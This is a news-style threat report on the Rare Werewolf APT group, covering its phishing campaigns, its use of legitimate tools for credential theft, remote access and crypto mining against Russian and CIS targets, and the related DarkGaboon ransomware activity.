Rare Werewolf APT: A New Era of Cyber Threats
Introduction to Rare Werewolf
The cyber landscape is constantly evolving, and one of the players drawing attention is the threat actor known as Rare Werewolf. Previously referred to as Rare Wolf, this group has gained notoriety for a series of targeted attacks against entities in Russia and neighboring Commonwealth of Independent States (CIS). According to security experts at Kaspersky, this group represents an advanced persistent threat (APT) that cleverly utilizes legitimate software to execute its operations.
Attack Methodology
What sets Rare Werewolf apart is its preference for existing third-party applications rather than crafting custom malicious software. This strategy often complicates detection and mitigation efforts. The tactics employed involve command scripts and PowerShell scripts to deliver malicious functionalities. These methods aim to create remote access to compromised systems, enabling attackers to siphon credentials and deploy XMRig cryptocurrency miners.
Target Demographics
The impact of Rare Werewolf’s activities has been broad, affecting hundreds of users across various sectors in Russia, especially in industrial enterprises and educational institutions focused on engineering. There have also been a smaller number of reported infections in Belarus and Kazakhstan. The group is believed to have been active since at least 2019, underscoring its persistence and adaptability to evolving security measures.
Phishing as an Attack Vector
A significant aspect of Rare Werewolf’s approach is its reliance on phishing emails to gain initial access. These emails are often bundled with password-protected archives that contain executable files designed to kickstart the infection process. Cybersecurity experts from BI.ZONE noted that the attack’s initiation typically occurs through these deceptive communications, which can compromise sensitive information.
Tools of the Trade
The threat actors frequently deploy legitimate tools—such as Mipko Employee Monitor and WebBrowserPassView—to exploit infected systems for password harvesting and to disable antivirus protections. In the most recent attacks recorded by Kaspersky, these tools were discovered within a malware delivery system characterized by password-protected archives, which also include decoy documents designed to masquerade as legitimate transactions.
The method of using a tool like 4t Tray Minimizer serves to further obfuscate the attackers’ activities, allowing them to minimize applications to the system tray, thereby maintaining a lower profile while conducting their operations.
Escalating the Attack
Once access is gained, the attackers fetch additional files from a remote server, which may include Defender Control and Blat, a utility designed to send stolen data through SMTP to an email controlled by the attackers. The methodology also comprises employing AnyDesk, a remote desktop application. A Windows batch file is instrumental in ensuring continuous access and data extraction by scheduling tasks that open a window for attackers to exploit the affected systems.
This batch script includes a PowerShell component that enables it to wake the victim’s machine automatically at local midnight for four hours of uninterrupted access before shutting down again at 5 a.m. This scheduling tactic showcases the thorough planning that goes into these attacks, highlighting how attackers can remain undetected for extended periods.
Broader Cybercriminal Activities
The risks posed by Rare Werewolf are compounded by the emergence of other cybercrime groups such as DarkGaboon, which is also targeting Russian organizations using LockBit 3.0 ransomware. DarkGaboon has been noted for its independent operations, utilizing phishing emails that contain malicious executable files. Similar to Rare Werewolf, DarkGaboon aims to blend into broader cybercriminal ecosystems, making it challenging to pin down specific origins and affiliations of these attacks.
Conclusion
As cyber threats continue to escalate, actions taken by groups like Rare Werewolf and DarkGaboon underline the ever-evolving tactics of cybercriminals. By leveraging legitimate software and sophisticated phishing techniques, these APTs not only impact individual victims but also expose vulnerabilities across entire sectors. Awareness and proactive measures are critical in combatting these rising threats to bolster cybersecurity defenses effectively.
